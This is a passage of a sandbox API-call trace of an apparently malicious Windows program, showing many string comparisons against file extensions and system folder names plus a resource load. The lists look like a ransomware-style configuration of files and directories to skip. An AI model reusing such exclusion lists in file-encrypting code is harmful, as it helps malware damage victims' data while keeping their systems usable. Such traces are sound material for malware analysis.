dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0098.089] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0098.089] SizeofResource 